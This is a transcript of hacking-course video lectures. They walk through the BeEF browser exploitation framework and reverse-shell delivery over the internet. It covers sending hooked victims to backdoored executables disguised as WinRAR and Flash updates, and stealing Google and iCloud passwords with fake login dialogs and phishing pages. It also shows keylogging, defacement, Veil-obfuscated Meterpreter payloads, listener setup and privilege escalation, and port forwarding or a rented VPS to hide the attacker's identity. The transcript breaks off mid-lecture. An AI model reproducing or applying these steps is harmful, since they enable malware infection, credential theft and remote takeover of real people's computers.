we will enable your web server. It's very important because we will redirect him to our web server. So our web server has to be enabled. Service Apache to start, and I'm gonna say enter. So now everything is ready to go, but we need to set a listener. In my case, I'm gonna set a listener right now, and we learned how to do that. It's just very simple and easy. And now I'm gonna say run, and my listener is ready. So once the target downloads my file and open it, I will get a reverse connection. So now let me come back to the module, which is redirect browser. So it's here, as you can see. And now I'm gonna put the full path or the IP address of our web server. Then gonna say slash wrar 540.exe, which is the name of WinRAR. So it's very simple and easy. Just put your IP address. So 192.168.0.150. Let me put http / and /wrar 540.exe, and now everything is ready. And once I hit execute, the file will be downloaded automatically. This is the old file. So let me say X, and I'm gonna say execute, and you will see that the file will be downloaded automatically on the target browser. As you can see here, I'm going to show in folder, and I'm gonna run it. Run anyway. So I'm gonna come back here, and as you can see, I have got a reverse connection to do whatever I want. So I'm going to say ls sysinfo, and as you can see, everything is ready. And just because we have redirected the target to a malicious file and the file has been downloaded, and once he open it, we will get a reverse connection. So we learned from this lecture how we can redirect the browser to any website you want, and as I show you right now, that we can redirect him to a malicious file or to a page that contains a malicious file that will be downloaded automatically on the target browser, or you can redirect him to a fake page to enter his login credentials so that you can steal his online account, or you can redirect him to any page you want. In this short lecture, we're going to have some fun with Beef, and this is by running a module that allows us to run any YouTube video on the target browser. So once we run the module, the YouTube video will run automatically, and the target don't have to do anything, so he's forced to see the YouTube video. So, and to do that, I'm going to show you first the module. Let me go to my target, and I'm going to say commands, and it's called redirect browser recrawl. It's in hooked domains, and here is it. Yeah, it's here. Redirect browser recrawl, and once we hit execute, we will redirect the target to any YouTube video we want, and this will be automatically. So he don't have to do anything. He don't have to press anything. Everything will be automatically. So, but before we do that, we should change the configuration file of this module just to run any YouTube video we want. So, but before we do that, let me go to my Firefox browser and open YouTube and choose a YouTube video from YouTube. So I'm going to YouTube, and I'm gonna say, I don't know what to say. I'm gonna say, for example, sound effect, and we have this sound effect. I'm gonna choose the first one, and then I'm gonna stop it, and I'm gonna take the ID of this video. As you can see, it's after v equal. This is the ID of this video. So I'm gonna copy it. I'm gonna minimize the window. Then I'm gonna open new terminal, and I'm going to go to the configuration file of the module. So I'm gonna say cd var www cd user share beef xs, and I'm gonna say enter. And as we have done before, so if I say it ls, you'll see the modules. I'm gonna say cd modules, and it's in cd browser hooked domains, and it's called recrawl. Enter, and if I say www, you will see the full path is user share beef xs, etc. So I'm gonna say ls again, and you will see that this is the configuration file, and I'm gonna change only the command.javascript. This is the code that we need to modify it, and I'm gonna use leafpad to do that. I'm gonna say leafpad, which is my text editor, and I'm gonna say command.js and enter. So here is the simple code that will run in the target browser, and as you can see here is the YouTube video that will run in the target browser. So here you only have to change the ID of the video. So after embed, if you double click on the ID, it will select automatically, and you will paste the ID that you have copied from the YouTube video. As you can see, this is it. So you can just copy the ID from the YouTube video and paste it here instead of the old ID. And now I'm going to say Ctrl S to save it, and I'm going to exit. So now I'm going to my browser and I'm going to run the module. So the video here, it's 4 minutes and 10 seconds, and it's called sound effects. And I'm going to recreate browser, and I'm going to say execute. But before we do that, let me show you my target. Let me come back to the previous page. Here's it. I'm going to refresh the page here as well to make sure that everything is correct. So here is it. I'm going to say execute, and look at here. So as you can see, it's the same video that we have chose. It's called sound effects, and it's 4 minutes and 10 seconds. And you can do that with any YouTube video you want. You can just change the ID of the video, and you can save it, and yeah, you can run any YouTube video you want on the target browser. In this lecture, I'm going to show how you can steal the target online accounts. This is done by using module that will pops up a dialog ask the target to renew his account session because the old one has been expired, and once the target fills in his credential, you will get the login information on your beef control panel. Or you can simply redirect the target to a fake page that looks like the original one, ask the target to enter his credentials. And actually there is already a Google fake page that comes by default with beef, and you can use it to steal the target Google accounts. Now let's see how to do that. Okay, so to do that, first I'm going to open my browser. And as you can see here, the hooked client, it's hooked with my website. And I'm going to show you my target. He's hooked to my website and everything is good. And to run the module, just go and select your target. And then I'm going to comments. And then I'm going to select social engineering. And then I'm going to say pretty theft. So the module called pretty theft. And here you can see that the description of this tool is ask the user for their username and password using a floating div. So here you're gonna select your dialog type, whether it's Facebook, Windows, YouTube, iOS, etc. So this is the most popular website. I think, yeah, it's the most popular website. And here you can select the plugin, whether you want it to be gray or clear, but I think the gray is good. And here you're gonna put your IP address instead of these zeros. So I'm gonna say 192.168.0.150. Hook over the internet, or how you can hack over the internet in the last section of this course. So you don't have to worry about that. I'm not just showing you how you can hook over your internal network. So I'm gonna show you how you can do or how you can hook over the internet. So everything is good here. Once I hit execute, as you can see, a window will pop up and it's gonna ask me to renew my session because my session is expired, because the sessions for every account do actually expire. So this is very legit. And you can see that the font of this page is a little bit flipped because the page is in Arabic. The original page, the original hooked page is in Arabic, so this issue could happen with you. But if the target was browsing or he was hooked with an English page, this problem would not happen with him. So here it's asking me to enter my password and email, and I'm gonna say sad@gmail.com, and the password I'm gonna say 123456789 and now let's say login. I'm gonna come back here, I'm gonna select the command, and as you can see the answer is sad@gmail.com and the password is 120. So now I'm gonna select my target again. I'm gonna run another dialog just to show you that it's work with any module you want or any dialog you want. Let's say for example iOS, and here I'm gonna put my Calix IP address. And yeah, everything is good here. I'm gonna say execute. Let me come back here, and as you can see here, the iCloud login, it's asking me to enter my password and email. let's say, for example, iCloud at gmail.com, and my password is sad1234, and I'm gonna say okay. Then I'm gonna come back here, I'm gonna select it, and as you can see, iCloud at gmail.com, and the password is sad1234. So there is another method that you can use it to steal the target credential or to steal the target Google account, and this is by using a module that comes with Beef that's called Google Phishing, and it's gonna redirect him to a fake page or to a phishing page, ask him to enter his username and password. So let me show you how you can do that. Just click on it and put your IP address. It's very simple and easy. And once I hit execute, it will run and it will redirect me to a Google page. So it's not suspicious at all. And I'm gonna say execute. I'm gonna come back to the target machine. And as you can see, it's very legit. So once he enters his username and password, you will get it. So let me say sad@gmail.com. My password is gmail1234. And I'm gonna say sign in. So I'm gonna come back here. As you can see, the username is sad@gmail.com and the password is gmail1234. And if you checked here, that you will see that the target has been redirected to the original website of Google. So this is good. And yeah. And also we learned in the previous video how we can redirect him to any page you want. So you can redirect him to any phishing page you want. This will be very good for you because you can, as I said before, you can redirect him to a Facebook phishing page instead of popping up a dialog asking him to enter that. You can just create a Facebook phishing page, or you can use a website that allows you to do that. You can just simply create an account into this website, and they will give you a phishing page that you can use it to steal the credential of someone. But I'm not going to show you all of that because this is illegal in my course. In this lecture, I'm going to show you how you can integrate Metasploit with Beef project. This will add tons of Metasploit exploit and module that you can use them directly from your Beef control panel on the target browser. So to do that, we shall modify some configuration files of Metasploit and Beef. Then we will load the configuration file that we have configured, and then we are ready to go. And if you have already hooked the browser, you will realize that more than 500 exploit and module will be loaded into Metasploit label automatically. Now let's see how we can do that. Okay, so first I'm going to start by opening a new terminal. And then I'm going to the full path of Beef project that's located in user share, Beef XSS. So I'm going to say cd user share Beef XSS, and I'm going to press enter. And I'm going to say ls to list all the files. And you can see here that there is a file called config.yaml. And I'm going to edit this file using my leafpad. So I'm going to type leafpad, which is my text editor, then config.yaml to edit the configuration file. And here is all the rules. I'm going to scroll down here, and you will see here Metasploit enable false. So we're going to change false to true. And now everything is okay. I'm going to say Ctrl S to save it and exit. Another thing, we need to change it. That's located in an extension of Beef project. So I'm going to say ls again. You can see here that there is a folder called extension. So I'm going to say cd extensions, enter, and I'm going to say ls again. You can see that there is a folder called Metasploit. Here's it. I'm going to it. So I'm going to say cd Metasploit, enter, ls, and here there is a configuration file that you have to change it as well. So config.yaml, I'm going to use my leafpad. So leafpad config.yaml and enter. So here you are going to change some information. So you're going to keep the username and the password as MSF and ABC123, and you're going to change the IP address to your internal IP address, or if you want to hook in public or over the internet, you have to put your public IP address. And I'm going to talk about this in the next section. So right now I'm going to put my IP address. So I'm going to open new terminal. I'm going to type ifconfig, and as you can see, here is my internal IP address 192.168.0.1. 150. I'm going to copy it and paste it here. And I'm going to put it here as well in the callback host. Okay. So now everything is okay. I'm gonna say Ctrl S and I'm going to exit. So right now we are gonna change the last configuration file in Metasploit path. So I'm going back 3 times. And now I'm in user share. I'm gonna say cd Metasploit framework, enter. And now I'm gonna say ls and I'm going to the config folder. So I'm gonna say cd config ls again, and you will see that there is a file called database.yaml. So I'm gonna use my leafpad as well to edit it. So leafpad database.yaml and enter. And here you want to make sure that the database is MSF and the username is MSF. And yeah, so everything is good right here. And the last step is to restart our CalNX. So I'm going to restart my CalNX. But before we do that, just let me show you that my Beef project right now doesn't have any modules from Metasploit framework. So I'm gonna type the username is Beef and the password is Beef. I'm gonna click any target, offline target. You'll see that I have only one module that comes by default with Beef. It's called the browser autopawn. And once we restart our CalNX, you will see that many modules and exploit will add to the Metasploit column. So I'm gonna say exit, and I'm going to restart my CalNX. So now our CalNX has been restarted. I'm going to open new terminal and I'm going to initialize my Metasploit database by typing msfdb init. And now it's ready. I'm gonna type msf console. And now I'm going to run or load a plugin that comes with Metasploit. I'm gonna say load, then I'm gonna say grpc, and I'm gonna add the server host. So the server host is your IP address. So I'm gonna type server host like this equal my IP address. Let me show you my IP address again. I'm gonna open new terminal. I'm gonna type ifconfig, and you can see that my internal IP address is this. I'm gonna copy it and paste it into MSF console. And now I'm gonna put the path, which is ABC123 that comes by default with Metasploit, and now I'm gonna say enter. So now as you can see, they successfully loaded the plugin. And the last thing we are going to do is go to Beef project. We can go to it from the terminal. I think it's better. So I'm going to cd user share Beef xss, which is the full path of Beef. I'm gonna say enter. You can see here that the tool is Beef from here. So I'm gonna add /Beef and enter, and now it's going to load all the modules and exploit that comes with Metasploit. So I'm gonna open my Beef control panel. And I'm going to type the username and the password. I'm gonna click on any target, and then I'm going to comment. And as you can see, now we have more than 500 exploit module that we can run with Metasploit. So once I click on Metasploit column, you will see that many exploit module that you can use. Let me just click on any module. So as you can see, you can set the SRV host, SRV port, and the path and the payload, type of the payload from here, etc. So you learned from this lecture how you can integrate your Metasploit database with Beef. That will help you to run any exploit or module that comes with Beef or from Metasploit into the target browser or the hooked target browser. So if your target was using Windows XP, Windows Vista 7, 8, and sometimes Windows 10, and there was an available vulnerability on the operating system, you can use any exploit or module from within Beef to run it into your target browser so that you can compromise his operating system. After learning how we can deal with Beef project and how to hook the browsers and run some modules, now it's time to learn how we can full control over the hooked browser. And to do that, we are going to use a module that allows us to display a legit page from Adobe Flash Player, asks the target to download an update. And of course, this update is our backdoor, and we learned before how we can create an undetectable payload and how we can combine it with any exe file. So once the target download the update and run it on his Windows operating system, we will get a reverse connection on our Kali Linux machine. Okay, so the first thing you're going to be doing is you will create an undetectable payload, and you will combine this payload with an exe file, and this exe file has to be Adobe Flash Player because we are going to run a module that will ask the target to install a fake update from Adobe Flash Player, and once he hit install, the fake Adobe Flash Player will install, and once he run it, the update will, or the fake update will run, and our payload will run at the same time, and we will get a reverse connection. And we have learned how you can combine any exe file with the payload, and this is by using shelter or veil evasion. So in my case, I'm going to show you that I have, let me open new terminal. Let me go to my web server. So I'm going to say cd var www html ls, so rmrf. Let me delete all of the payloads. Okay, so in my case, I have already combined the Adobe Flash Player or the fake update from Adobe Flash Player with my payload using shelter. And I'm going to show you that I have downloaded from the official website. So I'm going to say download Adobe Flash Player Windows. So I have downloaded from this page. Then I have combined it with the payload using shelter. So I have selected that the operating system is 10 and the version is the Chromium and Opera. Then install, and once you install it, you're going to use shelter to combine the payload or to inject the payload into it. So now our fake Adobe Flash Player update is on our web server, and now we're going to use a module that comes with Beef to ask the target to install Adobe Flash Player. So I'm going to show you that my target right now is hooked to my website, and I'm going to open my Beef control panel, and here is my victim. I'm going to click on it, and I'm going to commands. Then I'm going to select social engineering. Then I'm going to select fake flash update. So here I'm going to put my internal IP address, and if you are hacking over the internet, you are going to put your public IP address, and we're going to talk about that in the next section. For now, just let me put my local IP address or my internal IP address. And I'm going to use a custom payload, and I'm going to put the full path of my internal IP address with the fake update. So I'm going to say http://192.168.0.150/ and now I'm going to say the name of the fake update that we have created, which is flash player.exe. So let me check this again. So it's flash_player.exe, and here's it. So as you can see right now, everything is good in the target browser, and I'm going to say execute right now. I'm going to come back to the target machine. You can see that a dialog popped up and asked the target to install an update for Adobe Flash Player. I'm going to say install. So his Now he's installing the fake flash update, as you can see right here. Now it's on my desktop. I'm not gonna run it right now because I'm gonna set a listener. So let me come back and set a listener. So I'm gonna say msf db init to initialize my database. Now I'm gonna say msf console. Now I'm gonna set the listener, and we have learned all of that in the previous lectures. So I'm gonna say use exploit. Now I'm gonna set the payload is Windows Meterpreter reverse HTTPS. I'm gonna set the L port is 8080 and the L host is my Linux IP address. So I'm gonna make sure that everything is okay right now. So my internal IP address is this, and the L port is 8080, and now we are ready to go. I'm gonna say run, and now I'm gonna wait the reverse connection, and now we're gonna run the fake update. So I'm gonna click on it. I'm gonna say more info, run anyway. Then I'm gonna say yes because it's running in the administrator. As you can see, everything is okay, so the target can install the Adobe Flash Player, and we have got here a reverse connection. As you can see, I'm gonna say vwd ls, and I think we have the administrator privileges. So I'm gonna say get system. Yes, we have the administrator privileges as well, which is something good. And there is another module that you can use, but I think the best one is the fake flash update. We have fake notification bar. Just let me put my web server. I'm gonna want HTTP. Now I'm gonna put my Linux IP address and slash. I'm gonna put the name of the file or the name of the backdoor, which is flash player.exe. So this module will display a fake notification bar at the top of the screen. Ask the target to install an update for his Google Chrome, and once he hit install, it's gonna install, and once he run it, the backdoor will run and we will get a reverse connection. So let me say execute just to give an example. As you can see, additional plugins are required to display. I'm gonna say install missing plugins, and now it's gonna install the plugin, as you can see. And I think there is another module that you can use, which is also you can redirect him directly to your web server. So I'm gonna say, and we have learned that before, redirect the browser. You can just force him to install the payload or the backdoor, and you're gonna put your IP address here. So now we will redirect him on our to install our backdoor, as you can see right now. So I'm gonna say execute, and now the file will download automatically. So it's telling me that it's gonna download multi-files because I have already downloaded the Adobe Flash. I'm gonna say hello, and as you can see, the backdoor has been installed, and you can run it and get a reverse connection once you set a listener. So we learned from this lecture how we can full control over the target machine, and this is by displaying a dialog asks the target to install the update of Adobe Flash Player, and once he hit install, the file will be installed on his computer, and once he run it, we will get a reverse connection. Or we can simply ask him to install a plugin on his Windows operating system or on his browser, and once he install the browser and run it, we will get also a reverse connection. And also we learned how we can redirect him directly to our backdoor so that he can download it automatically, and once he run it, we will get also a reverse connection. In this section, I'm going to show you some funny modules that you can run with Beav. So here I have several modules that you can run. For example, you can detect the virtual machine, you can get the internal IP address, or you can start a chat with the target browser. You can create a dialog box, etc. So we're going to start with detect the virtual machine. So I'm going to my Beav control panel, then I'm going to select the target, then I'm going to the comments, and I'm going to search for detect. So I'm going to click on the search bar, I'm going to say detect. And I'm going to search for detect virtual machine. I'm going to click on it, and if we read the description, it says this module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment. So right now I'm going to say execute, and I'm going to the command, and you can see here it's telling me it's not virtualized, and actually we are running in a virtual machine. So how is that? So because I'm using the full resolution of my screen, it's gonna tell me that this machine is not a virtual machine. But once I minimize the resolution of the screen and run the module again, it's gonna tell me that it's a virtual machine. So let's try to run the module again. Here is it. So this host is virtualized or uses an unrecognized screen resolution, and here is the screen resolution. So it gave out this result because some people uses the virtual machine in a small resolution, which is something good to keep their privacy. I'm gonna give you another module that allows you to get the internal IP address of the host machine or of the target machine, because sometimes when you hook over the internet and you want to know the internal IP address, you'll not be able to do that. So, but with this module, you can get the internal IP address. So I'm going to say internal. So as you can see, it's called internal IP web RTC. So I'm going to say execute. And as you can see here, the IP address is 192.168.0.18. And you can see here that it gave us the IP version 6 as well. So let me show you here. I'm going to the CMD, and I'm going to type IP config. And you will see that the IP is 192.168.0.18. Now let me show you another module that allows us to register the log from the target browser. So let me go to logs from here. And now I'm going to come back to the target browser. And if I hit, for example, here, hello, I'm going to come back to the target machine. I'm going to refresh it from here. You can see that the target is typing hello. As you can see, the user typed hello. So it's registering what the target is typing. For example, I'm going to say sad, which is my name. I'm going to refresh the page again. You can see that the target typed sad, etc. And there is another module that allows you to replace the content of the target browser, and this is by going to the commands, and I'm going to say replace, and I'm going to say enter, and it's called replace content deface. I'm going to click on it, and I'm going to change this IP address, and I'm going to put my IP address, the IP address of my Linux. So it's going to change the icon of the browser from here. And the new title of the tab is going to be this instead of iSecurity Pro. We're gonna say just for example hacked, and the content is gonna be, let's give you an example. You have been hacked, just for example. So now I'm gonna say execute, and I'm gonna come back to the target machine, and you can see here that it's called hacked, and you have been hacked. You will see that you have been hacked, but because the page was in Arabic, so it's going to show you from the right side, from the right to left. But if the page was in English, it's going to start from left to right, etc. And there is another module that allows you to get the page HTML code, and this is by typing, for example, I think it's called HTML, get page HTML. So that's it. I'm gonna say execute, and let me click on it and see. As you can see, here is all my website HTML code. So you can get it from here. And also you can use another module that allows you to create a alert dialog. So I'm gonna type alert. So create alert dialog, and we're gonna say you have been hacked, and I'm gonna say execute. I'm gonna come back here, and you can see here iSecurity Pro says you have been hacked. And also we can start a conversation with the target, and this is by creating a prompt dialog. So I'm gonna say prompt. So create prompt dialog, and I'm gonna say the message is gonna be, for example, how are you? And I'm gonna say execute. I'm gonna come back to the target machine. Let me execute it again because there was module running. I'm gonna say how are you? And I'm gonna say execute again. As you can see, so iSecurity Pro says how are you? I'm gonna say, for example, fine. I'm gonna say okay, and I'm gonna come back on the command. It should give me the result. So as you can see, the answer is fine. So this module allows you to start a conversation with the target browser. And there is another module that allows you to create a dialog box. So let's say dialog box. So here's it, create, let me just check it. Let me refresh the page again to rehook the target with my beef control panel, and I'm gonna refresh my page, and I'm gonna search for dialog. Yeah, here's it. It's called block UI module dialog that will display a message to the target, for example, and it will prevent him from browsing the page. So if he's trying to browse this website, we will prevent him from that until he refreshes the page. So I'm gonna say, how are you, my friend? And I'm gonna say execute. And as you can see, how are you, my friend? And it's gonna keep like this, and he's not gonna be able to browse the website anymore. So here is some funny modules that you can run with Beef. Well, we have learned a lot of modules. For example, you can detect the virtual machine, get the internal IP address, register the log from the target page or from the target tab, replace the content, get the page HTML, and a lot of more modules that we have explained. I hope you enjoyed in this section. If you have any question you want to ask, just go to Q&A section and ask your question there, or you can send me a direct message and I'll be glad to respond. In the previous sections, we learned how to full access the target machine and how to combine our payload with any kind of file and how to deal with peer project and run tons of modules. But all of this so far was in our LAN network on our main router, and we didn't learn how to full access a certain computer over the internet. So in this section, we're going to learn how to get a reverse connection over the internet. So even if the target is connected to a completely different network, you will be able to get a reverse connection on your colony machine. So in this section, we are going to learn more than method to get a reverse connection over WAN network. And to do that, we shall learn how to forward any connection on a certain port from the router to our colony machine. This is very important because if you learn port forwarding, you will be able to get a reverse connection over WAN network. And that means that you can hook any browser on the internet with Beef, and you'll be able to compromise any Windows operating system on the internet once the target run our payload. So in the next lecture, we are going to start by learning the theory behind port forwarding and why it's important and why we use it. And then you will learn how to configure the router to forward the connection on a certain port to your computer. And lastly, if you faced any issue during practicing, don't hesitate to ask me any question you want on Q&A section or send me a direct message and I'll be glad to respond. In this lecture, we're going to be talking about how to configure our router to forward any connection on a certain port to our device. But before we get started, we shall learn what is port forwarding. Port forwarding is the process of configuring a router to make a computer or other network device that's connected to it accessible to other computers and network devices from outside of the local network. And port forwarding uses an IP address plus port number to route network requests to specific devices. And also we have something called NAT, or network address transfer, and NAT is a method of remapping one IP address space into another by modifying network address information in Internet Protocol datagram packet headers while they are in transit across a traffic routing device. And the main use of NAT is to limit the number of public IP addresses and for an economy and security purposes. And that's why they have created NAT method to connect to the internet, and they inserted this method into each router in the world. Now let's take an example. Here we have 3 computers are connected to one router, and this router is connected to the internet. And let's say that you are the client, you are this computer, and you want to browse google.com. So you're going to open your browser, type www.google.com, and then your browser is going to send this request to the router, and the router is going to send this request to the ISP or the internet service provider, and from the internet service provider it's going to send it to the server or to the internet. From the internet it's going to send the request back to the ISP. From the ISP is going to send it to the router, and the router is going to send it to your computer to browse google.com. And all of these computers that are connected to this router can interact with each other. So as you can see, all of them start with 192.168.0, 192.168.0, 192.168.0. So they can interact with each other. But if they try to interact with the computer that are out of the network, they will not be able to interact with the computer that are out of the network, because these are a private IP address. And that's why there is a public IP address that allows this computer to interact with the internet and connects to other computers. So the IP address of this router, or the public IP address of this router, is gonna be the same as this computer. So the public IP address is gonna be same to this computer, and this public IP address is gonna be same to this computer. So there is only one public IP address is for the router, and this public IP address is for all the clients that are connected to the routers. So if you check the IP address or the public IP address of this computer is gonna be same to this computer, and this computer is gonna be same to this computer. So now let's assume that you have created a backdoor, and the L host of this backdoor was let's say 192.168.0.2, and the L port is 1234. And you have sent this backdoor to your target that is connected to the internet. So once your target runs the backdoor, you will not get a reverse connection, because actually you gave him your private IP address, and your private IP address is actually cannot interact with the computer that are out of the network, as I said before. So now we're gonna assume that you have configured your backdoor, and you have set the L host as your public IP address. So the L host is going to be the router IP address, or the public IP address of the router, and then you have sent the backdoor to your target. So once your target open your backdoor or run your backdoor, it's gonna connect to the internet. From the internet, it's gonna get a reverse connection to your router, but this reverse connection is gonna be only for your router. But your router is not gonna redirect this connection to your computer. So that's why we port forwarding. So what we are gonna be doing in this lecture, we are going to the router settings, and then we will go to set any connection or any reverse connection on port TCP or port UDP. We're gonna set this in port TCP and UDP. Let's say any connection on port 1234 redirected to this computer. So what you are gonna be doing here, you are gonna configure your backdoor. You're gonna put the L host as your public IP address, and the L port, let's say 1234. Then you are gonna send it to your target. And because you have set a rule here, says any TCP connection on port 1234 redirected to this computer. So once the target open your backdoor, it's gonna get a reverse connection to your router, and your router is gonna redirect this connection to your computer, and then you'll be able to get a multiplayer session. Now let's see how to do that. Okay, so the first thing we're gonna be doing is we need to get the IP address of our router. So to do that, I'm gonna open your terminal, and then I'm going to use the command route -n for numeric, and then I'm going to press enter, and here you will see your IP address, or the IP address of your router, which is 192.168.0.1 in my case. So I'm going to copy it, and I'm going to open my browser, Then I'm gonna paste it into the URL bar, and it's gonna ask me to enter my username and password. And if you don't know what is your username and password, you can simply go to your router and flip it, and there will be a sticker includes the username and the password. So right now I'm gonna enter my password. And here is the interface of my router. So probably you're gonna see a different interface to your router because not all the routers are the same. So I'm gonna just give you an idea how you can forward any port. You can just search for a port forwarding or a virtual server, and this will allow you to forward any port. In my case, it's in advanced settings, then security, and as you can see, it's called IP and port filtering. So as you can see here, it's gonna tell me that if I want to forward any port, it has to be on IP version 6. And actually this doesn't work with us. We need to get an IP version 4 to forward any port. But unfortunately, the ISP or the internet service provider doesn't allow me to forward any port, and it's asked me to upgrade my account to a business account to get an IP version 4, and I have to pay more money every month. So that's why I have decided to use a VPS to get a reverse connection, because I think it's cheaper than paying it's about like 15 euros an additional cost of the original cost that I'm gonna pay. So if you are facing the same issue, so it's better for you to watch the next lecture, because it shows you how you can create a VPS and forward any port to your device. So if I said, for example, create a new rule, I'm gonna say the protocol, let's say for example all, and single. It's asked me to enter my IP version 6, and as I told before, it doesn't work with us. But here I have another router that's running on my network that works as a repeater, and it has this IP address 192.168.0.2. So this router works as a repeater, and I'm gonna enter the username and password, and the default is admin. I'm gonna say enter. And you will see, or usually you will see the version of the router at the top from here. You can simply copy it and open new tab and paste it here, and then you can type port forwarding. So here you will see a lot of tutorials shows you how you can forward any port to your device for this version of the router. So now let's take an example. In my case, it's called forwarding. I'm gonna say virtual server. I'm gonna say add new. So here I'm gonna select the service port, which is the port that you are listening to. For example, we have seen how to listen on port 8080, or we were listening on port 8080. We use port 8080. So I'm gonna say 8080, and the internal port is not important. You can leave it blank. And here you're gonna put the IP address of your Cal Linux. So I'm going to open your terminal. I'm going to type ifconfig, and you will see here that this is the IP address of my Cal Linux. You're going to copy it and type it here. So it's going to redirect the connection on port 8080 to your device. And the protocol is going to be all. And the status of this rule is going to be enabled. And then I'm going to say save. So as I told you in the introduction, if the target run your backdoor, your router is gonna receive the connection, but your router is not gonna be able to redirect this connection to your device. But now, because we have created a rule says any connection on port 8080 redirected to our device, so we will get the reverse connection on our Cal Linux machine. And in the next lecture, I'm gonna show how you can configure your backdoor to run over the internet. Okay, so after learning how we can forward any connection on a certain port to our Cal Linux machine, now we're going to learn how we can configure our backdoor to run over the internet. So to do that, just now let's start with creating a backdoor. I'm going to want to use veil of agents, so I'm going to say cd veil. Here's it. So I'm going to say use #1 to use veil of agent, and now I'm going to say list, and I'm going to select let's say for example we want to use this particular payload, so it's number 10. I'm gonna say use 10, and now I'm gonna set the L port. Let's start with the L port. Set L port. Let's say I'm gonna use port 8080, And for the L port, you're gonna put your public IP address or the public IP address of the router. So I'm gonna say set L host, and now I'm gonna get the IP address of the router or the public IP address of the router. But unfortunately, my or the IP address of my router or the IP version 4 of my router is not enabled from the internet service provider. So I can see it, but I cannot forward any port on it. So let's say can you see me.org. And as you can see, here is my public IP address. I can simply copy it, and then I'm gonna minimize the window, and I'm gonna put it right here. And then I'm gonna say enter, and let's say info or options, and here is the port 8080, and the L host is on my public IP address. So now I'm gonna say generate, enter, and here is our payload is ready to use. I'm gonna copy it and put it on my desktop. So I'm gonna say CP for copy, and I'm gonna put it on my desktop. So here is the backdoor that we are gonna send it to the target. So once the target we open our payload, we are gonna get a reverse connection to our machine. So as I told you before, I don't have the ability to forward any connection on a certain port to my device because I'm using an IP version 6. I'm not using an IP version 4. But in your case, if you have the ability to forward any connection on a certain port, you have the port forwarding feature on your router. You're gonna do as I show you in the previous lecture. You can just go to the setting of the router and create a new rule and redirect the connection on the port, for example 8080, to your KLiNX machine. You're gonna put the IP address of your KLiNX machine, and then you're gonna create the rule, and all the connection that's coming on the port 8080 is gonna be forwarded to your KLiNX machine. So you're gonna send this backdoor, as I told you before, to your target, and once you open it, you're gonna get the reverse connection. But before we send it to our target, we need to set a listener. So I'm gonna say clear. I'm gonna say MSF init to initialize my Metasploit database. MSFDB init. And now I'm gonna say MSF console to use the interface of Metasploit. So now I'm gonna say use exploit multi-handler to set a listener, and now I'm gonna specify the payload that I have used. So I'm gonna say set payload Windows meter preter. So this is the type of the payload that we have used, reverse HTTPS, and I'm gonna say show options, and I'm gonna set the L port, and as you can see it's 8080. It's not this port, it's HTTPS, this type of payload that we have used. I'm gonna say show options again, and as you can see the L port is 8443. I'm gonna change it, so I'm gonna say set L port to 8080. So this is the port that we have configured when we were creating our payload. And then I'm gonna say enter, and I'm gonna set the L host. For the L host, I'm gonna put the internal IP address of my KLiNX. So I'm not gonna put the public IP address of the router. I'm gonna put the internal IP address of my KLiNX, and we've seen how to check our IP address. Here's it. I'm gonna copy it from here and paste it. Let me say show option again, and you will see that the L host is my internal IP address, or the KLiNX IP address, and the port is 8080, which is the port that I'm using it in my payload. And then I'm gonna say run. And so now our listener is ready, and once the target open our payload, we're gonna get a reverse connection. But if you have the same issue that I'm facing it right now, you're gonna use the second method that I'm gonna talk about in the next lecture. Another method we can use to forward the connection to our device on a certain port is by using a VPS, or a virtual private server. And basically the VPS is a virtual server that works 24/7, and you can log into it anytime you want from any device you want, so you can connect to it using an iPhone, Android, Windows, Linux, or any other operating system. And to get a VPS, you have to pay for a subscription, and this subscription usually starts from $3 or $4 up to $100 or $150. That depends on the specification and the operating system that's running on it. And sometimes you can get it for free. But in our case, we're gonna pay only $5 to get a Linux VPS, and this is gonna be enough for us. So the main idea here is we're gonna get a Linux VPS, and then we can specify any port we want to listen on it through SSH, and we are ready to go. And there are two reasons why we use VPS. The first reason is to hide our identity. So if the target detects your IP address, it's going to be useless because it's the VPS IP address, and our server is in a completely different location. And the second reason is sometimes the ISP or the internet service provider doesn't allow you to forward any port. Now let's see how to do that. Okay, so to get a VPS, we are going to use this website, which is digitalocean.com, and it's very simple and basic. You can just sign up. You can put your email and password, then it's going to send a confirmation email to your inbox. You can open it and confirm your account. In my case, I have already created an account and I'm logged in right now. As you can see, here is the interface of the website. So the first thing you're going to be doing is you're going to create a droplet or a VPS server. And then you're going to select the operating system that you want to use. So we have Ubuntu, Fedora, FreeBSD, Debian, CoreOS, CentOS, etc. And also we have the size or the specification of the machine. In my case, I'm going to use only this or the $5 per month, because actually we are only port forwarding or forwarding the port to our machine, and we don't need that high specification. So I think it's enough. 500 megabyte of RAM, 20 gigabyte of storage, and 1000 gigabyte for transfer. And I'm gonna scroll down, and here you're gonna select the location of the VPS. You can select if you want US or United Kingdom, Germany, or Canada, etc. I'm gonna leave it as New York, and then I'm gonna scroll down, and here you will choose the host name. I'm gonna say, for example, test, and then I'm gonna say create. So the next step is you are going to add or you're going to charge your account by going to this icon from here, and then you are going to setting, and then billing, and you're going to charge your account. So as we saw before, the VPS costs $5. You're going to charge your account $5. In my case, I have $250 or $2.50, and you can charge using PayPal or credit card or a debit card, and then you're gonna charge your account. As you can see, in my case, I have charged my account many times. So now our VPS is ready, and it's gonna send us an email to our inbox, includes the username and the password and the IP address of the machine. So now let's minimize the window and try to log into our VPS. So I'm going to open new terminal, and I'm going to log into my VPS using SSH. So I'm going to say SSH, then I'm going to say root. So I'm going to log in as root, add, and then I'm going to add the IP address of the VPS, and I'm going to say enter. Now it's going to ask us if you want to continue connecting. I'm going to say yes, and now it's going to ask us to enter the password, and this is the password. I'm going to copy it and paste it here. So now we're going to use a new password. So the current Unix password is going to be this one that we have copied, and enter. And now let's set a new password. In my case, I'm going to set a new password, and I'm going to retype the new password. And now I'm ready into my VPS machine. So it's very basic and simple. You can use the terminal commands. You can say ls pwd to your current directory, cd double points to come back, ls, and as you can see here, the system folders. So now let me say exit, and now we are going to create our backdoor or our payload using veil evasion. So I'm gonna say cd veil. I'm gonna launch veil evasion, and we have learned how to create payload using veil evasion. So use number one to use veil evasion, and I'm gonna say list. And I'm going to use this payload. Let's say, for example, I'm going to use the HTTPS. it's number 10. So use number 10 and set L port. Let's say, for example, the port this time is gonna be 1234, and set L host. So the L host here is gonna be your VPS IP address. It's not gonna be your internal IP address or your public IP address as we saw in the previous video. So you're gonna put the IP address of your VPS server that we have created, and then enter. And now I'm gonna say generate, enter, and I'm gonna copy it and put it on my desktop. So CP for copy, and I'm gonna put it on my desktop. Here's it. So now the next step is we are going to forward the connection to our machine. So 